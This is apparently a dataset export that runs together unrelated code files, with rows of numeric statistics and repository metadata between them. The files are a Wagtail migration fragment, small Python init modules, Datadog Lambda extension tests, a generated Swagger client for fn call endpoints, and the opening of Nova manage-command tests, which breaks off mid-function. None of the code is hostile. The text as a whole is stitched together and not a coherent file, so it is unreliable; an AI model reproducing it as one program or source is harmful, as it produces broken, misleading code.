('right_column', wagtail.core.blocks.StreamBlock((('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('table', wagtail.contrib.table_block.blocks.TableBlock()), ('image_map', wagtail.core.blocks.StructBlock((('map', wagtail_svgmap.blocks._ImageMapChoiceBlock(label='Image map', required=True)), ('css_class', wagtail.core.blocks.CharBlock(label='CSS class', required=False)))))), icon='arrow-right', label='Right column content'))))), ('collapsible', wagtail.core.blocks.RichTextBlock(icon='collapse-down', label='Collapsible paragraph', template='content/blocks/collapsible.html')))),
        ),
    ]
| 138.870968 | 1,812 | 0.741231 | 491 | 4,305 | 6.399185 | 0.160896 | 0.126034 | 0.178549 | 0.0993 | 0.875239 | 0.865691 | 0.865691 | 0.865691 | 0.865691 | 0.865691 | 0 | 0.005275 | 0.075261 | 4,305 | 30 | 1,813 | 143.5 | 0.783974 | 0.015796 | 0 | 0.347826 | 1 | 0 | 0.20666 | 0.023855 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.304348 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
ae6c8733cae6be5a430c9360e8225a20dd9374ae | 297 | py | Python | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
] | 1 | 2020-03-31T17:17:40.000Z | 2020-03-31T17:17:40.000Z | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
] | 2 | 2020-03-31T17:18:38.000Z | 2020-03-31T17:21:13.000Z | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
] | null | null | null | from timebomb.forms.login import LoginForm # noqa
from timebomb.forms.game import GameForm # noqa
from timebomb.forms.wait import WaitingForm # noqa
from timebomb.forms.cut import CutForm # noqa
from timebomb.forms.notif import NotifForm # noqa
from timebomb.forms.end import EndForm # noqa
| 42.428571 | 51 | 0.79798 | 42 | 297 | 5.642857 | 0.404762 | 0.303797 | 0.43038 | 0.443038 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141414 | 297 | 6 | 52 | 49.5 | 0.929412 | 0.097643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
883ccd2404f113a4c2a844aadd81a5ce7edf5d52 | 102 | py | Python | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | fib_num_1 = lambda n: fib_num_1(n-1) + fib_num_1(n-2) if n > 2 else 1
def power(a, b):
    return a ** b
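The `fib_num_1` lambda above relies on conditional-expression precedence: the whole sum `fib_num_1(n-1) + fib_num_1(n-2)` is guarded by `if n > 2`, so both base cases `n = 1` and `n = 2` return 1 and the recursion terminates. A quick check of the first few values:

```python
fib_num_1 = lambda n: fib_num_1(n - 1) + fib_num_1(n - 2) if n > 2 else 1

assert [fib_num_1(n) for n in range(1, 8)] == [1, 1, 2, 3, 5, 8, 13]
```

(PEP 8 would prefer a `def` over a named lambda, and this naive recursion is exponential in `n`, but the precedence behaviour is the subtle part worth verifying.)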
8882fa8f2fcf24a79f7d11485c626abe1b1bfe66 | 2,493 | py | Python | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 30 | 2020-08-12T12:32:57.000Z | 2022-03-28T09:37:17.000Z | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 54 | 2020-08-05T21:39:48.000Z | 2022-03-25T18:22:25.000Z | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 20 | 2020-08-19T18:52:12.000Z | 2022-03-13T06:48:08.000Z | import os
import unittest
import httpretty
from unittest.mock import patch
from datadog_lambda.extension import (
is_extension_running,
flush_extension,
should_use_extension,
)
def exceptionCallback(request, uri, headers):
raise Exception("oopsy!")
class TestLambdaExtension(unittest.TestCase):
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_is_extension_running_true(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.GET, "http://127.0.0.1:8124/lambda/hello")
assert is_extension_running() == True
assert httpretty.last_request() != last_request
httpretty.disable()
def test_is_extension_running_file_not_found(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.GET, "http://127.0.0.1:8124/lambda/hello")
assert is_extension_running() == False
assert httpretty.last_request() == last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_is_extension_running_http_failure(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(
httpretty.GET,
"http://127.0.0.1:8124/lambda/hello",
status=503,
body=exceptionCallback,
)
assert is_extension_running() == False
assert httpretty.last_request() != last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_flush_ok(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.POST, "http://127.0.0.1:8124/lambda/flush")
assert flush_extension() == True
assert httpretty.last_request() != last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_flush_not_ok(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(
httpretty.POST,
"http://127.0.0.1:8124/lambda/flush",
status=503,
body=exceptionCallback,
)
assert flush_extension() == False
assert httpretty.last_request() != last_request
httpretty.disable()
| 34.625 | 84 | 0.67509 | 282 | 2,493 | 5.673759 | 0.187943 | 0.1375 | 0.1875 | 0.071875 | 0.80875 | 0.751875 | 0.751875 | 0.751875 | 0.751875 | 0.6775 | 0 | 0.028689 | 0.217008 | 2,493 | 71 | 85 | 35.112676 | 0.790984 | 0 | 0 | 0.540984 | 0 | 0 | 0.133173 | 0.062575 | 0 | 0 | 0 | 0 | 0.163934 | 1 | 0.098361 | false | 0 | 0.081967 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee1a2e0499af1a4ee43e5fa9264a494496d8b864 | 47 | py | Python | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | 11 | 2019-10-03T18:47:49.000Z | 2022-02-01T10:42:02.000Z | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | null | null | null | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | 8 | 2019-10-03T18:47:53.000Z | 2021-06-07T14:47:51.000Z | from .parsers import *
from .password import *
| 15.666667 | 23 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
c987f8e5819ed09167b55c880240fbab8ed007d9 | 21,100 | py | Python | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | 6 | 2017-09-24T16:50:49.000Z | 2019-10-23T22:14:39.000Z | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
fn
The open source serverless platform.
OpenAPI spec version: 0.2.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CallApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client
    def apps_app_calls_call_get(self, app, call, **kwargs):
        """
        Get call information
        Get call information
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_get(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: app name (required)
        :param str call: Call ID. (required)
        :return: CallWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_call_get_with_http_info(app, call, **kwargs)
        else:
            (data) = self.apps_app_calls_call_get_with_http_info(app, call, **kwargs)
            return data
    def apps_app_calls_call_get_with_http_info(self, app, call, **kwargs):
        """
        Get call information
        Get call information
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_get_with_http_info(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: app name (required)
        :param str call: Call ID. (required)
        :return: CallWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['app', 'call']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_call_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_get`")
        # verify the required parameter 'call' is set
        if ('call' not in params) or (params['call'] is None):
            raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_get`")

        collection_formats = {}

        path_params = {}
        if 'app' in params:
            path_params['app'] = params['app']
        if 'call' in params:
            path_params['call'] = params['call']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls/{call}', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CallWrapper',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
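Each generated `*_with_http_info` method opens with the same defensive pattern: build an allow-list of parameter names, snapshot `locals()`, and reject any keyword argument that is not in the list. A stripped-down, dependency-free sketch of that validation step (the function name and shape here are illustrative, not part of the generated client):

```python
def validate_kwargs(method_name, all_params, kwargs):
    # Mirrors the generated code: any unexpected keyword raises TypeError,
    # so typos in optional arguments fail loudly instead of being ignored.
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )
    return dict(kwargs)


params = validate_kwargs("apps_app_calls_call_get",
                         ["app", "call", "callback"],
                         {"app": "myapp", "call": "123"})
assert params == {"app": "myapp", "call": "123"}
```

Without this check, a misspelled keyword such as `callbck=` would simply vanish into `**kwargs` and the caller would never learn why their callback was not invoked.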
    def apps_app_calls_call_log_delete(self, call, app, **kwargs):
        """
        Delete call log entry
        Delete call log entry
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_delete(call, app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str call: Call ID. (required)
        :param str app: App name. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
        else:
            (data) = self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
            return data
    def apps_app_calls_call_log_delete_with_http_info(self, call, app, **kwargs):
        """
        Delete call log entry
        Delete call log entry
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_delete_with_http_info(call, app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str call: Call ID. (required)
        :param str app: App name. (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['call', 'app']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_call_log_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'call' is set
        if ('call' not in params) or (params['call'] is None):
            raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_delete`")
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_delete`")

        collection_formats = {}

        path_params = {}
        if 'call' in params:
            path_params['call'] = params['call']
        if 'app' in params:
            path_params['app'] = params['app']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def apps_app_calls_call_log_get(self, app, call, **kwargs):
        """
        Get call logs
        Get call logs
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_get(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App Name (required)
        :param str call: Call ID. (required)
        :return: LogWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
        else:
            (data) = self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
            return data
    def apps_app_calls_call_log_get_with_http_info(self, app, call, **kwargs):
        """
        Get call logs
        Get call logs
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_call_log_get_with_http_info(app, call, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App Name (required)
        :param str call: Call ID. (required)
        :return: LogWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['app', 'call']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_call_log_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_get`")
        # verify the required parameter 'call' is set
        if ('call' not in params) or (params['call'] is None):
            raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_get`")

        collection_formats = {}

        path_params = {}
        if 'app' in params:
            path_params['app'] = params['app']
        if 'call' in params:
            path_params['call'] = params['call']

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='LogWrapper',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def apps_app_calls_get(self, app, **kwargs):
        """
        Get app-bound calls.
        Get app-bound calls can filter to route-bound calls, results returned in created_at, descending order (newest first).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_get(app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App name. (required)
        :param str path: Route path to match, exact.
        :param str cursor: Cursor from previous response.next_cursor to begin results after, if any.
        :param int per_page: Number of results to return, defaults to 30. Max of 100.
        :param int from_time: Unix timestamp in seconds, of call.created_at to begin the results at, default 0.
        :param int to_time: Unix timestamp in seconds, of call.created_at to end the results at, defaults to latest.
        :return: CallsWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.apps_app_calls_get_with_http_info(app, **kwargs)
        else:
            (data) = self.apps_app_calls_get_with_http_info(app, **kwargs)
            return data
    def apps_app_calls_get_with_http_info(self, app, **kwargs):
        """
        Get app-bound calls.
        Get app-bound calls can filter to route-bound calls, results returned in created_at, descending order (newest first).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.apps_app_calls_get_with_http_info(app, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str app: App name. (required)
        :param str path: Route path to match, exact.
        :param str cursor: Cursor from previous response.next_cursor to begin results after, if any.
        :param int per_page: Number of results to return, defaults to 30. Max of 100.
        :param int from_time: Unix timestamp in seconds, of call.created_at to begin the results at, default 0.
        :param int to_time: Unix timestamp in seconds, of call.created_at to end the results at, defaults to latest.
        :return: CallsWrapper
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['app', 'path', 'cursor', 'per_page', 'from_time', 'to_time']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method apps_app_calls_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'app' is set
        if ('app' not in params) or (params['app'] is None):
            raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_get`")

        collection_formats = {}

        path_params = {}
        if 'app' in params:
            path_params['app'] = params['app']

        query_params = []
        if 'path' in params:
            query_params.append(('path', params['path']))
        if 'cursor' in params:
            query_params.append(('cursor', params['cursor']))
        if 'per_page' in params:
            query_params.append(('per_page', params['per_page']))
        if 'from_time' in params:
            query_params.append(('from_time', params['from_time']))
        if 'to_time' in params:
            query_params.append(('to_time', params['to_time']))

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api('/apps/{app}/calls', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='CallsWrapper',
                                        auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
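The docstrings above describe the generated client's two calling modes (synchronous by default, asynchronous when a `callback` is supplied). The following is a minimal stand-in sketch of that dispatch pattern, not the real client: `_StubApi` and its `_fetch` helper are hypothetical names introduced here only to make the sync/async behavior concrete.

```python
import threading


class _StubApi(object):
    """Tiny stand-in mimicking the generated sync/async dispatch."""

    def _fetch(self, app):
        # Stands in for the HTTP call returning a CallsWrapper.
        return {'app': app, 'calls': []}

    def apps_app_calls_get(self, app, callback=None):
        if callback:
            # Async mode: run the request on a worker thread, invoke the
            # callback with the response, and return the thread (as the
            # generated client documents).
            thread = threading.Thread(
                target=lambda: callback(self._fetch(app)))
            thread.start()
            return thread
        # Sync mode: block and return the response directly.
        return self._fetch(app)


api = _StubApi()
result = api.apps_app_calls_get('myapp')                   # synchronous
thread = api.apps_app_calls_get('myapp', callback=print)   # asynchronous
thread.join()
```

In the real generated code the same branch appears in `apps_app_calls_get`: a truthy `callback` in `kwargs` makes it return the value of `call_api` (the request thread) instead of the unpacked response data.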
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Ilya Alekseyev
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from six.moves import StringIO
import sys

import fixtures
import mock
from oslo_utils import uuidutils

from nova.cmd import manage
from nova import conf
from nova import context
from nova import db
from nova.db import migration
from nova.db.sqlalchemy import migration as sqla_migration
from nova import exception
from nova import objects
from nova import test
from nova.tests.unit.db import fakes as db_fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_network
from nova.tests.unit import test_flavors

CONF = conf.CONF
class FixedIpCommandsTestCase(test.TestCase):
    def setUp(self):
        super(FixedIpCommandsTestCase, self).setUp()
        db_fakes.stub_out_db_network_api(self)
        self.commands = manage.FixedIpCommands()

    def test_reserve(self):
        self.commands.reserve('192.168.0.100')
        address = db.fixed_ip_get_by_address(context.get_admin_context(),
                                             '192.168.0.100')
        self.assertTrue(address['reserved'])

    def test_reserve_nonexistent_address(self):
        self.assertEqual(2, self.commands.reserve('55.55.55.55'))

    def test_unreserve(self):
        self.commands.unreserve('192.168.0.100')
        address = db.fixed_ip_get_by_address(context.get_admin_context(),
                                             '192.168.0.100')
        self.assertFalse(address['reserved'])

    def test_unreserve_nonexistent_address(self):
        self.assertEqual(2, self.commands.unreserve('55.55.55.55'))

    def test_list(self):
        self.useFixture(fixtures.MonkeyPatch('sys.stdout',
                                             StringIO()))
        self.commands.list()
        self.assertNotEqual(1, sys.stdout.getvalue().find('192.168.0.100'))

    def test_list_just_one_host(self):
        def fake_fixed_ip_get_by_host(*args, **kwargs):
            return [db_fakes.fixed_ip_fields]

        self.useFixture(fixtures.MonkeyPatch(
            'nova.db.fixed_ip_get_by_host',
            fake_fixed_ip_get_by_host))
        self.useFixture(fixtures.MonkeyPatch('sys.stdout',
                                             StringIO()))
        self.commands.list('banana')
        self.assertNotEqual(1, sys.stdout.getvalue().find('192.168.0.100'))

class FloatingIpCommandsTestCase(test.NoDBTestCase):
    def setUp(self):
        super(FloatingIpCommandsTestCase, self).setUp()
        db_fakes.stub_out_db_network_api(self)
        self.commands = manage.FloatingIpCommands()

    def test_address_to_hosts(self):
        def assert_loop(result, expected):
            for ip in result:
                self.assertIn(str(ip), expected)

        address_to_hosts = self.commands.address_to_hosts
        # /32 and /31
        self.assertRaises(exception.InvalidInput, address_to_hosts,
                          '192.168.100.1/32')
        self.assertRaises(exception.InvalidInput, address_to_hosts,
                          '192.168.100.1/31')
        # /30
        expected = ["192.168.100.%s" % i for i in range(1, 3)]
        result = address_to_hosts('192.168.100.0/30')
        self.assertEqual(2, len(list(result)))
        assert_loop(result, expected)
        # /29
        expected = ["192.168.100.%s" % i for i in range(1, 7)]
        result = address_to_hosts('192.168.100.0/29')
        self.assertEqual(6, len(list(result)))
        assert_loop(result, expected)
        # /28
        expected = ["192.168.100.%s" % i for i in range(1, 15)]
        result = address_to_hosts('192.168.100.0/28')
        self.assertEqual(14, len(list(result)))
        assert_loop(result, expected)
        # /16
        result = address_to_hosts('192.168.100.0/16')
        self.assertEqual(65534, len(list(result)))
        # NOTE(dripton): I don't test /13 because it makes the test take 3s.
        # /12 gives over a million IPs, which is ridiculous.
        self.assertRaises(exception.InvalidInput, address_to_hosts,
                          '192.168.100.1/12')

class NetworkCommandsTestCase(test.NoDBTestCase):
    def setUp(self):
        super(NetworkCommandsTestCase, self).setUp()
        self.commands = manage.NetworkCommands()
        self.net = {'id': 0,
                    'label': 'fake',
                    'injected': False,
                    'cidr': '192.168.0.0/24',
                    'cidr_v6': 'dead:beef::/64',
                    'multi_host': False,
                    'gateway_v6': 'dead:beef::1',
                    'netmask_v6': '64',
                    'netmask': '255.255.255.0',
                    'bridge': 'fa0',
                    'bridge_interface': 'fake_fa0',
                    'gateway': '192.168.0.1',
                    'broadcast': '192.168.0.255',
                    'dns1': '8.8.8.8',
                    'dns2': '8.8.4.4',
                    'vlan': 200,
                    'vlan_start': 201,
                    'vpn_public_address': '10.0.0.2',
                    'vpn_public_port': '2222',
                    'vpn_private_address': '192.168.0.2',
                    'dhcp_start': '192.168.0.3',
                    'project_id': 'fake_project',
                    'host': 'fake_host',
                    'uuid': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'}

        def fake_network_get_by_cidr(context, cidr):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(cidr, self.fake_net['cidr'])
            return db_fakes.FakeModel(dict(test_network.fake_network,
                                           **self.fake_net))

        def fake_network_get_by_uuid(context, uuid):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(uuid, self.fake_net['uuid'])
            return db_fakes.FakeModel(dict(test_network.fake_network,
                                           **self.fake_net))

        def fake_network_update(context, network_id, values):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(network_id, self.fake_net['id'])
            self.assertEqual(values, self.fake_update_value)
        self.fake_network_get_by_cidr = fake_network_get_by_cidr
        self.fake_network_get_by_uuid = fake_network_get_by_uuid
        self.fake_network_update = fake_network_update

    def test_create(self):

        def fake_create_networks(obj, context, **kwargs):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(kwargs['label'], 'Test')
            self.assertEqual(kwargs['cidr'], '10.2.0.0/24')
            self.assertFalse(kwargs['multi_host'])
            self.assertEqual(kwargs['num_networks'], 1)
            self.assertEqual(kwargs['network_size'], 256)
            self.assertEqual(kwargs['vlan'], 200)
